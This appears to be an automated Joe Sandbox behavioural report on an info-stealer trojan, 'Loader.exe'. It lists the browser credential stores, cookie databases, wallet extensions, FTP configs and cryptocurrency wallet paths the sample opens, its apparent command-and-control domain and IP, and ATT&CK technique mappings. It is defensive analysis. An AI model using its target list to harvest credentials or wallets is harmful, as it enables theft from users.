                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: Yara matchFile source: 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2324979359.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2298858534.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2299868440.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 504, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 504, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                21
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol41
                Data from Local System
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager241
                Security Software Discovery
                SMB/Windows Admin Shares3
                Clipboard Data
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS21
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem33
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Loader.exe37%ReversingLabsWin32.Trojan.Generic
                Loader.exe32%VirustotalBrowse
                Loader.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://volcanohushe.click/api$P0%Avira URL Cloudsafe
                https://volcanohushe.click/T0%Avira URL Cloudsafe
                https://volcanohushe.click:443/apik0%Avira URL Cloudsafe
                https://volcanohushe.click/api0%Avira URL Cloudsafe
                https://volcanohushe.click/ts/M0%Avira URL Cloudsafe
                https://volcanohushe.click/%app0%Avira URL Cloudsafe
                https://volcanohushe.click:443/apiXMVQGAH.xlsxH0%Avira URL Cloudsafe
                https://volcanohushe.click/0%Avira URL Cloudsafe
                volcanohushe.click0%Avira URL Cloudsafe
                https://volcanohushe.click/api2K0%Avira URL Cloudsafe
                https://volcanohushe.click:443/api0%Avira URL Cloudsafe
                https://volcanohushe.click/M??0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                volcanohushe.click
                172.67.145.201
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  wordyfindy.latfalse
                    high
                    curverpluch.latfalse
                      high
                      slipperyloo.latfalse
                        high
                        tentabatte.latfalse
                          high
                          manyrestro.latfalse
                            high
                            shapestickyr.latfalse
                              high
                              talkynicer.latfalse
                                high
                                https://volcanohushe.click/apitrue
                                • Avira URL Cloud: safe
                                unknown
                                bashfulacid.latfalse
                                  high
                                  volcanohushe.clicktrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabLoader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://volcanohushe.click/TLoader.exe, 00000003.00000003.2205684949.0000000000AAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://volcanohushe.click:443/apikLoader.exe, 00000003.00000003.2378382701.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://duckduckgo.com/ac/?q=Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoLoader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiLoader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://volcanohushe.click/Loader.exe, 00000003.00000003.2457635116.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://volcanohushe.click/%appLoader.exe, 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2324979359.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298858534.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2299868440.0000000000AAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://volcanohushe.click:443/apiXMVQGAH.xlsxHLoader.exe, 00000003.00000003.2325175528.0000000000B29000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.rootca1.amazontrust.com/rootca1.crl0Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://ocsp.rootca1.amazontrust.com0:Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://volcanohushe.click/api$PLoader.exe, 00000003.00000003.2324626659.0000000000B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.ecosia.org/newtab/Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgLoader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLoader.exe, 00000003.00000003.2266478331.00000000034C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ac.ecosia.org/autocomplete?q=Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://volcanohushe.click/tLoader.exe, 00000003.00000003.2378382701.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3409099739.0000000000AF5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2457635116.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgLoader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://x1.c.lencr.org/0Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://x1.i.lencr.org/0Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLoader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?Loader.exe, 00000003.00000003.2264365441.00000000033D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://volcanohushe.click/ts/MLoader.exe, 00000003.00000003.2205684949.0000000000AAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://support.mozilla.org/products/firefoxgro.allLoader.exe, 00000003.00000003.2266478331.00000000034C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://volcanohushe.click/api2KLoader.exe, 00000003.00000003.2299745097.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2330397824.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3409137229.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2300072128.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298552259.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298638638.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2325175528.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2330501381.0000000000B13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://www.mozilla.orLoader.exe, 00000003.00000003.2266368076.00000000033CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://volcanohushe.click:443/apiLoader.exe, 00000003.00000003.2298552259.0000000000B29000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2299745097.0000000000B29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaLoader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://volcanohushe.click/M??Loader.exe, 00000003.00000003.2205684949.0000000000A91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    172.67.145.201
                                                                                    volcanohushe.clickUnited States
                                                                                    13335CLOUDFLARENETUStrue
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1580145
                                                                                    Start date and time:2024-12-24 02:16:08 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 5m 29s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:8
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:Loader.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@4/1@1/1
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 95%
                                                                                    • Number of executed functions: 48
                                                                                    • Number of non-executed functions: 146
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    TimeTypeDescription
                                                                                    20:17:05API Interceptor8x Sleep call for process: Loader.exe modified
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
